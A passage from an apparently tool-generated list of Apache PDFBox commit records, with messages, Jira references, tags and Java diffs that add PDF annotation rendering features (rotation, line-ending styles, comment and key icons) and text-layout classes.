"pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "fc473f26660e41f841b1630e60266d885b1ed220", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527704572, - "hunks": 2, - "message": "PDFBOX-3280: make class package local again, see https://stackoverflow.com/questions/50593597/pdfbox-clone-font git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832561 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java", - "index 773ecd0cb..f91b25608 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java", - "@@ -38,5 +38,4 @@ import org.apache.pdfbox.pdmodel.common.COSObjectable;", - " */", - "-public class PDFCloneUtility", - "+class PDFCloneUtility", - " {", - "-", - " private final PDDocument destination;" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3280": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3280", - "relevance": 2 - } - ] - }, - { - "commit_id": "0870eabaaaf88efa52c8fffed44cd12032b201ef", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528298846, - "hunks": 5, - "message": "PDFBOX-3353: support undocumented /Rotate setting; make width smaller git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833043 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "index bf6d65593..071d9ce67 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "@@ -25,2 +25,3 @@ import org.apache.pdfbox.cos.COSArray;", - " import org.apache.pdfbox.cos.COSBase;", - "+import org.apache.pdfbox.cos.COSName;", - " import org.apache.pdfbox.cos.COSNumber;", - "@@ -207,3 +208,9 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - "-", - "+ // rotation is an undocumented feature, but Adobe uses it. Examples can be found", - "+ // in pdf_commenting_new.pdf file.", - "+ int rotation = annotation.getCOSObject().getInt(COSName.ROTATE, 0);", - "+ cs.transform(Matrix.getRotateInstance(Math.toRadians(rotation), 0, 0));", - "+ float xOffset;", - "+ float yOffset;", - "+ float width = rotation == 90 || rotation == 270 ? getRectangle().getHeight(): getRectangle().getWidth();", - " // somewhat inspired by AppearanceGeneratorHelper.insertGeneratedAppearance()", - "@@ -217,2 +224,22 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " float fontSize = extractFontSize(annotation);", - "+ switch (rotation)", - "+ {", - "+ case 180:", - "+ xOffset = - getRectangle().getUpperRightX() + fontSize / 2 * factor; ", - "+ yOffset = - getRectangle().getLowerLeftY() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor;", - "+ break;", - "+ case 90:", - "+ xOffset = getRectangle().getLowerLeftY() + fontSize / 2 * factor;", - "+ yOffset = - getRectangle().getLowerLeftX() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor;", - "+ break;", - "+ case 270:", - "+ xOffset = - getRectangle().getUpperRightY() + fontSize / 2 * factor;", - "+ yOffset = getRectangle().getUpperRightX() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor;", - "+ break;", - "+ case 0:", - "+ default:", - "+ xOffset = getRectangle().getLowerLeftX() + fontSize / 2 * factor;", - "+ yOffset = getRectangle().getUpperRightY() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor;", - "+ break;", - "+ }", - " cs.setFont(font, fontSize);", - "@@ -225,8 +252,6 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " .text(new PlainText(annotation.getContents()))", - "- .width(getRectangle().getWidth())", - "+ .width(width - fontSize / factor)", - " .wrapLines(true)", - " //TODO some reverse engineering needed to find out padding", - "- //TODO fat cloudy rectangle in CTAN file has \"the\" incomplete", - "- .initialOffset(getRectangle().getLowerLeftX() + fontSize / 2 * factor, ", - "- getRectangle().getUpperRightY() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor)", - "+ .initialOffset(xOffset, yOffset)", - " // Adobe ignores the /Q" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "a3d012bc6eef223ba21b26ba57f377b49d599a89", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1526743174, - "hunks": 2, - "message": "PDFBOX-3353: support /LE array (line start / ending styles) git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831899 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java", - "index 30968ce10..b5833f84a 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java", - "@@ -22,2 +22,3 @@ import org.apache.pdfbox.cos.COSName;", - " import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", - "+import static org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine.LE_NONE;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDAppearanceHandler;", - "@@ -56,2 +57,86 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", - "+ /**", - "+ * This will set the line ending style for the start point, see the LE_ constants for the possible values.", - "+ *", - "+ * @param style The new style.", - "+ */", - "+ public void setStartPointEndingStyle(String style)", - "+ {", - "+ if (style == null)", - "+ {", - "+ style = LE_NONE;", - "+ }", - "+ COSBase base = getCOSObject().getDictionaryObject(COSName.LE);", - "+ COSArray array;", - "+ if (!(base instanceof COSArray) || ((COSArray) base).size() == 0)", - "+ {", - "+ array = new COSArray();", - "+ array.add(COSName.getPDFName(style));", - "+ array.add(COSName.getPDFName(LE_NONE));", - "+ getCOSObject().setItem(COSName.LE, array);", - "+ }", - "+ else", - "+ {", - "+ array = (COSArray) base;", - "+ array.setName(0, style);", - "+ }", - "+ }", - "+", - "+ /**", - "+ * This will retrieve the line ending style for the start point, possible values shown in the LE_ constants section.", - "+ *", - "+ * @return The ending style for the start point, LE_NONE if missing, never null.", - "+ */", - "+ public String getStartPointEndingStyle()", - "+ {", - "+ COSBase base = getCOSObject().getDictionaryObject(COSName.LE);", - "+ if (base instanceof COSArray && ((COSArray) base).size() >= 2)", - "+ {", - "+ return ((COSArray) base).getName(0, LE_NONE);", - "+ }", - "+ return LE_NONE;", - "+ }", - "+", - "+ /**", - "+ * This will set the line ending style for the end point, see the LE_ constants for the possible values.", - "+ *", - "+ * @param style The new style.", - "+ */", - "+ public void setEndPointEndingStyle(String style)", - "+ {", - "+ if (style == null)", - "+ {", - "+ style = LE_NONE;", - "+ }", - "+ COSBase base = getCOSObject().getDictionaryObject(COSName.LE);", - "+ COSArray array;", - "+ if (!(base instanceof COSArray) || ((COSArray) base).size() < 2)", - "+ {", - "+ array = new COSArray();", - "+ array.add(COSName.getPDFName(LE_NONE));", - "+ array.add(COSName.getPDFName(style));", - "+ getCOSObject().setItem(COSName.LE, array);", - "+ }", - "+ else", - "+ {", - "+ array = (COSArray) base;", - "+ array.setName(1, style);", - "+ }", - "+ }", - "+", - "+ /**", - "+ * This will retrieve the line ending style for the end point, possible values shown in the LE_ constants section.", - "+ *", - "+ * @return The ending style for the end point, LE_NONE if missing, never null.", - "+ */", - "+ public String getEndPointEndingStyle()", - "+ {", - "+ COSBase base = getCOSObject().getDictionaryObject(COSName.LE);", - "+ if (base instanceof COSArray && ((COSArray) base).size() >= 2)", - "+ {", - "+ return ((COSArray) base).getName(1, LE_NONE);", - "+ }", - "+ return LE_NONE;", - "+ }", - "+", - " /**" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "1c324b02db8d2f1f53256965d4c5b4f3cb5bb2cc", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530200372, - "hunks": 4, - "message": "PDFBOX-3353: support /Comment and /Key git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834620 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "index 2a9eeabf6..5c49ce015 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "@@ -62,2 +62,4 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " SUPPORTED_NAMES.add(PDAnnotationText.NAME_UP_LEFT_ARROW);", - "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_COMMENT);", - "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_KEY);", - " }", - "@@ -83,6 +85,2 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- //TODO Comment, Key", - "- // BBox values:", - "- // Key 13 18", - "- // Comment 18 18", - " return;", - "@@ -150,2 +148,8 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " break;", - "+ case PDAnnotationText.NAME_COMMENT:", - "+ drawComment(annotation, contentStream);", - "+ break;", - "+ case PDAnnotationText.NAME_KEY:", - "+ drawKey(annotation, contentStream);", - "+ break;", - " default:", - "@@ -585,2 +589,88 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "+ private void drawComment(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - "+ throws IOException", - "+ {", - "+ adjustRectAndBBox(annotation, 18, 18);", - "+", - "+ contentStream.setMiterLimit(4);", - "+ contentStream.setLineJoinStyle(1);", - "+ contentStream.setLineCapStyle(0);", - "+ contentStream.setLineWidth(0.59f); // value from Adobe", - "+", - "+ contentStream.addRect(0.3f, 0.3f, 18-0.6f, 18-0.6f);", - "+ contentStream.stroke();", - "+", - "+ contentStream.setNonStrokingColor(0);", - "+ contentStream.transform(Matrix.getScaleInstance(0.003f, 0.003f));", - "+ contentStream.transform(Matrix.getTranslateInstance(500, -300));", - "+ ", - "+ // shape from Font Awesome by \"printing\" comment.svg into a PDF", - "+ contentStream.moveTo(2549, 5269);", - "+ contentStream.curveTo(1307, 5269, 300, 4451, 300, 3441);", - "+ contentStream.curveTo(300, 3023, 474, 2640, 764, 2331);", - "+ contentStream.curveTo(633, 1985, 361, 1691, 357, 1688);", - "+ contentStream.curveTo(299, 1626, 283, 1537, 316, 1459);", - "+ contentStream.curveTo(350, 1382, 426, 1332, 510, 1332);", - "+ contentStream.curveTo(1051, 1332, 1477, 1558, 1733, 1739);", - "+ contentStream.curveTo(1987, 1659, 2261, 1613, 2549, 1613);", - "+ contentStream.curveTo(3792, 1613, 4799, 2431, 4799, 3441);", - "+ contentStream.curveTo(4799, 4451, 3792, 5269, 2549, 5269);", - "+ contentStream.closePath();", - "+ contentStream.moveTo(2549, 2035);", - "+ contentStream.curveTo(2315, 2035, 2083, 2071, 1860, 2141);", - "+ contentStream.lineTo(1661, 2204);", - "+ contentStream.lineTo(1490, 2083);", - "+ contentStream.curveTo(1364, 1994, 1192, 1895, 984, 1828);", - "+ contentStream.curveTo(1048, 1935, 1111, 2054, 1159, 2182);", - "+ contentStream.lineTo(1252, 2429);", - "+ contentStream.lineTo(1071, 2620);", - "+ contentStream.curveTo(912, 2790, 721, 3070, 721, 3441);", - "+ contentStream.curveTo(721, 4216, 1541, 4847, 2549, 4847);", - "+ contentStream.curveTo(3558, 4847, 4378, 4216, 4378, 3441);", - "+ contentStream.curveTo(4378, 2666, 3558, 2035, 2549, 2035);", - "+ contentStream.fill();", - "+ }", - "+ ", - "+ private void drawKey(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - "+ throws IOException", - "+ {", - "+ adjustRectAndBBox(annotation, 13, 18);", - "+", - "+ contentStream.setMiterLimit(4);", - "+ contentStream.setLineJoinStyle(1);", - "+ contentStream.setLineCapStyle(0);", - "+ contentStream.setLineWidth(200);", - "+", - "+ contentStream.transform(Matrix.getScaleInstance(0.003f, 0.003f));", - "+ contentStream.transform(Matrix.getRotateInstance(Math.toRadians(45), 2500, -800));", - "+", - "+ // shape from Font Awesome by \"printing\" key.svg into a PDF", - "+ contentStream.moveTo(4799, 4004);", - "+ contentStream.curveTo(4799, 3149, 4107, 2457, 3253, 2457);", - "+ contentStream.curveTo(3154, 2457, 3058, 2466, 2964, 2484);", - "+ contentStream.lineTo(2753, 2246);", - "+ contentStream.curveTo(2713, 2201, 2656, 2175, 2595, 2175);", - "+ contentStream.lineTo(2268, 2175);", - "+ contentStream.lineTo(2268, 1824);", - "+ contentStream.curveTo(2268, 1707, 2174, 1613, 2057, 1613);", - "+ contentStream.lineTo(1706, 1613);", - "+ contentStream.lineTo(1706, 1261);", - "+ contentStream.curveTo(1706, 1145, 1611, 1050, 1495, 1050);", - "+ contentStream.lineTo(510, 1050);", - "+ contentStream.curveTo(394, 1050, 300, 1145, 300, 1261);", - "+ contentStream.lineTo(300, 1947);", - "+ contentStream.curveTo(300, 2003, 322, 2057, 361, 2097);", - "+ contentStream.lineTo(1783, 3519);", - "+ contentStream.curveTo(1733, 3671, 1706, 3834, 1706, 4004);", - "+ contentStream.curveTo(1706, 4858, 2398, 5550, 3253, 5550);", - "+ contentStream.curveTo(4109, 5550, 4799, 4860, 4799, 4004);", - "+ contentStream.closePath();", - "+ contentStream.moveTo(3253, 4425);", - "+ contentStream.curveTo(3253, 4192, 3441, 4004, 3674, 4004);", - "+ contentStream.curveTo(3907, 4004, 4096, 4192, 4096, 4425);", - "+ contentStream.curveTo(4096, 4658, 3907, 4847, 3674, 4847);", - "+ contentStream.curveTo(3441, 4847, 3253, 4658, 3253, 4425);", - "+ contentStream.fillAndStroke();", - "+ }", - "+ ", - " private void addPath(final PDAppearanceContentStream contentStream, GeneralPath path) throws IOException" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "23dfd579cfcd8f5775fbc0336dea63d5b7619176", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528040184, - "hunks": 3, - "message": "PDFBOX-4212: add text formatter classes to new ..annotation.layout package git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832775 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", - "new file mode 100644", - "index 000000000..5688ec385", - "--- /dev/null", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", - "@@ -0,0 +1,102 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+package org.apache.pdfbox.pdmodel.interactive.annotation.text;", - "+", - "+import org.apache.pdfbox.pdmodel.font.PDFont;", - "+", - "+/**", - "+ * Define styling attributes to be used for text formatting.", - "+ * ", - "+ */", - "+class AppearanceStyle", - "+{", - "+ private PDFont font;", - "+ /**", - "+ * The font size to be used for text formatting.", - "+ *", - "+ * Defaulting to 12 to match Acrobats default.", - "+ */", - "+ private float fontSize = 12.0f;", - "+ ", - "+ /**", - "+ * The leading (distance between lines) to be used for text formatting.", - "+ *", - "+ * Defaulting to 1.2*fontSize to match Acrobats default.", - "+ */", - "+ private float leading = 14.4f;", - "+ ", - "+ /**", - "+ * Get the font used for text formatting.", - "+ * ", - "+ * @return the font used for text formatting.", - "+ */", - "+ PDFont getFont()", - "+ {", - "+ return font;", - "+ }", - "+ ", - "+ /**", - "+ * Set the font to be used for text formatting.", - "+ * ", - "+ * @param font the font to be used.", - "+ */", - "+ void setFont(PDFont font)", - "+ {", - "+ this.font = font;", - "+ }", - "+ ", - "+ /**", - "+ * Get the fontSize used for text formatting.", - "+ * ", - "+ * @return the fontSize used for text formatting.", - "+ */", - "+ float getFontSize()", - "+ {", - "+ return fontSize;", - "+ }", - "+ ", - "+ /**", - "+ * Set the font size to be used for formatting.", - "+ * ", - "+ * @param fontSize the font size.", - "+ */", - "+ void setFontSize(float fontSize)", - "+ {", - "+ this.fontSize = fontSize;", - "+ leading = fontSize * 1.2f;", - "+ }", - "+", - "+ /**", - "+ * Get the leading used for text formatting.", - "+ * ", - "+ * @return the leading used for text formatting.", - "+ */", - "+ float getLeading()", - "+ {", - "+ return leading;", - "+ }", - "+ ", - "+ /**", - "+ * Set the leading used for text formatting.", - "+ * ", - "+ * @param leading the leading to be used.", - "+ */", - "+ void setLeading(float leading)", - "+ {", - "+ this.leading = leading;", - "+ }", - "+}", - "\\ No newline at end of file", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", - "new file mode 100644", - "index 000000000..c61c8824c", - "--- /dev/null", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", - "@@ -0,0 +1,290 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+package org.apache.pdfbox.pdmodel.interactive.annotation.text;", - "+", - "+import java.io.IOException;", - "+import java.text.AttributedString;", - "+import java.text.BreakIterator;", - "+import java.text.AttributedCharacterIterator.Attribute;", - "+import java.util.ArrayList;", - "+import java.util.Arrays;", - "+import java.util.List;", - "+", - "+import org.apache.pdfbox.pdmodel.font.PDFont;", - "+", - "+/**", - "+ * A block of text.", - "+ *

    ", - "+ * A block of text can contain multiple paragraphs which will", - "+ * be treated individually within the block placement.", - "+ *

    ", - "+ * ", - "+ */", - "+class PlainText", - "+{", - "+ private static final float FONTSCALE = 1000f;", - "+ ", - "+ private final List paragraphs;", - "+ ", - "+ /**", - "+ * Construct the text block from a single value.", - "+ * ", - "+ * Constructs the text block from a single value splitting", - "+ * into individual {@link Paragraph} when a new line character is ", - "+ * encountered.", - "+ * ", - "+ * @param textValue the text block string.", - "+ */", - "+ PlainText(String textValue)", - "+ {", - "+ List parts = Arrays.asList(textValue.replaceAll(\"\\t\", \" \").split(\"\\\\r\\\\n|\\\\n|\\\\r|\\\\u2028|\\\\u2029\"));", - "+ paragraphs = new ArrayList<>();", - "+ for (String part : parts)", - "+ {", - "+ \t// Acrobat prints a space for an empty paragraph", - "+ \tif (part.length() == 0)", - "+ \t{", - "+ \t\tpart = \" \";", - "+ \t}", - "+ paragraphs.add(new Paragraph(part));", - "+ }", - "+ }", - "+ ", - "+ /**", - "+ * Construct the text block from a list of values.", - "+ * ", - "+ * Constructs the text block from a list of values treating each", - "+ * entry as an individual {@link Paragraph}.", - "+ * ", - "+ * @param listValue the text block string.", - "+ */", - "+ PlainText(List listValue)", - "+ {", - "+ paragraphs = new ArrayList<>();", - "+ for (String part : listValue)", - "+ {", - "+ paragraphs.add(new Paragraph(part));", - "+ }", - "+ }", - "+ ", - "+ /**", - "+ * Get the list of paragraphs.", - "+ * ", - "+ * @return the paragraphs.", - "+ */", - "+ List getParagraphs()", - "+ {", - "+ return paragraphs;", - "+ }", - "+ ", - "+ /**", - "+ * Attribute keys and attribute values used for text handling.", - "+ * ", - "+ * This is similar to {@link java.awt.font.TextAttribute} but", - "+ * handled individually as to avoid a dependency on awt.", - "+ * ", - "+ */", - "+ static class TextAttribute extends Attribute", - "+ {", - "+ /**", - "+ * UID for serializing.", - "+ */", - "+ private static final long serialVersionUID = -3138885145941283005L;", - "+", - "+ /**", - "+ * Attribute width of the text.", - "+ */", - "+ public static final Attribute WIDTH = new TextAttribute(\"width\");", - "+ ", - "+ protected TextAttribute(String name)", - "+ {", - "+ super(name);", - "+ }", - "+ ", - "+", - "+ }", - "+", - "+ /**", - "+ * A block of text to be formatted as a whole.", - "+ *

    ", - "+ * A block of text can contain multiple paragraphs which will", - "+ * be treated individually within the block placement.", - "+ *

    ", - "+ * ", - "+ */", - "+ static class Paragraph", - "+ {", - "+ private final String textContent;", - "+ ", - "+ Paragraph(String text)", - "+ {", - "+ textContent = text;", - "+ }", - "+ ", - "+ /**", - "+ * Get the paragraph text.", - "+ * ", - "+ * @return the text.", - "+ */", - "+ String getText()", - "+ {", - "+ return textContent;", - "+ }", - "+ ", - "+ /**", - "+ * Break the paragraph into individual lines.", - "+ * ", - "+ * @param font the font used for rendering the text.", - "+ * @param fontSize the fontSize used for rendering the text.", - "+ * @param width the width of the box holding the content.", - "+ * @return the individual lines.", - "+ * @throws IOException", - "+ */", - "+ List getLines(PDFont font, float fontSize, float width) throws IOException", - "+ {", - "+ BreakIterator iterator = BreakIterator.getLineInstance();", - "+ iterator.setText(textContent);", - "+ ", - "+ final float scale = fontSize/FONTSCALE;", - "+ ", - "+ int start = iterator.first();", - "+ int end = iterator.next();", - "+ float lineWidth = 0;", - "+ ", - "+ List textLines = new ArrayList<>();", - "+ Line textLine = new Line();", - "+", - "+ while (end != BreakIterator.DONE)", - "+ {", - "+ String word = textContent.substring(start,end);", - "+ float wordWidth = font.getStringWidth(word) * scale;", - "+ ", - "+ lineWidth = lineWidth + wordWidth;", - "+", - "+ // check if the last word would fit without the whitespace ending it", - "+ if (lineWidth >= width && Character.isWhitespace(word.charAt(word.length()-1)))", - "+ {", - "+ float whitespaceWidth = font.getStringWidth(word.substring(word.length()-1)) * scale;", - "+ lineWidth = lineWidth - whitespaceWidth;", - "+ }", - "+ ", - "+ if (lineWidth >= width)", - "+ {", - "+ textLine.setWidth(textLine.calculateWidth(font, fontSize));", - "+ textLines.add(textLine);", - "+ textLine = new Line();", - "+ lineWidth = font.getStringWidth(word) * scale;", - "+ }", - "+ ", - "+ AttributedString as = new AttributedString(word);", - "+ as.addAttribute(TextAttribute.WIDTH, wordWidth);", - "+ Word wordInstance = new Word(word);", - "+ wordInstance.setAttributes(as);", - "+ textLine.addWord(wordInstance);", - "+ start = end;", - "+ end = iterator.next();", - "+ }", - "+ textLine.setWidth(textLine.calculateWidth(font, fontSize));", - "+ textLines.add(textLine);", - "+ return textLines;", - "+ }", - "+ }", - "+", - "+ /**", - "+ * An individual line of text.", - "+ */", - "+ static class Line", - "+ {", - "+ private final List words = new ArrayList<>();", - "+ private float lineWidth;", - "+", - "+ float getWidth()", - "+ {", - "+ return lineWidth;", - "+ }", - "+ ", - "+ void setWidth(float width)", - "+ {", - "+ lineWidth = width;", - "+ }", - "+ ", - "+ float calculateWidth(PDFont font, float fontSize) throws IOException", - "+ {", - "+ final float scale = fontSize/FONTSCALE;", - "+ float calculatedWidth = 0f;", - "+ for (Word word : words)", - "+ {", - "+ calculatedWidth = calculatedWidth + ", - "+ (Float) word.getAttributes().getIterator().getAttribute(TextAttribute.WIDTH);", - "+ String text = word.getText();", - "+ if (words.indexOf(word) == words.size() -1 && Character.isWhitespace(text.charAt(text.length()-1)))", - "+ {", - "+ float whitespaceWidth = font.getStringWidth(text.substring(text.length()-1)) * scale;", - "+ calculatedWidth = calculatedWidth - whitespaceWidth;", - "+ }", - "+ }", - "+ return calculatedWidth;", - "+ }", - "+", - "+ List getWords()", - "+ {", - "+ return words;", - "+ }", - "+ ", - "+ float getInterWordSpacing(float width)", - "+ {", - "+ return (width - lineWidth)/(words.size()-1);", - "+ }", - "+", - "+ void addWord(Word word)", - "+ {", - "+ words.add(word);", - "+ }", - "+ }", - "+ ", - "+ /**", - "+ * An individual word.", - "+ * ", - "+ * A word is defined as a string which must be kept", - "+ * on the same line.", - "+ */", - "+ static class Word", - "+ {", - "+ private AttributedString attributedString;", - "+ private final String textContent;", - "+ ", - "+ Word(String text)", - "+ {", - "+ textContent = text;", - "+ }", - "+ ", - "+ String getText()", - "+ {", - "+ return textContent;", - "+ }", - "+ ", - "+ AttributedString getAttributes()", - "+ {", - "+ return attributedString;", - "+ }", - "+ ", - "+ void setAttributes(AttributedString as)", - "+ {", - "+ this.attributedString = as;", - "+ }", - "+ }", - "+}", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", - "new file mode 100644", - "index 000000000..6458d8404", - "--- /dev/null", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", - "@@ -0,0 +1,287 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - 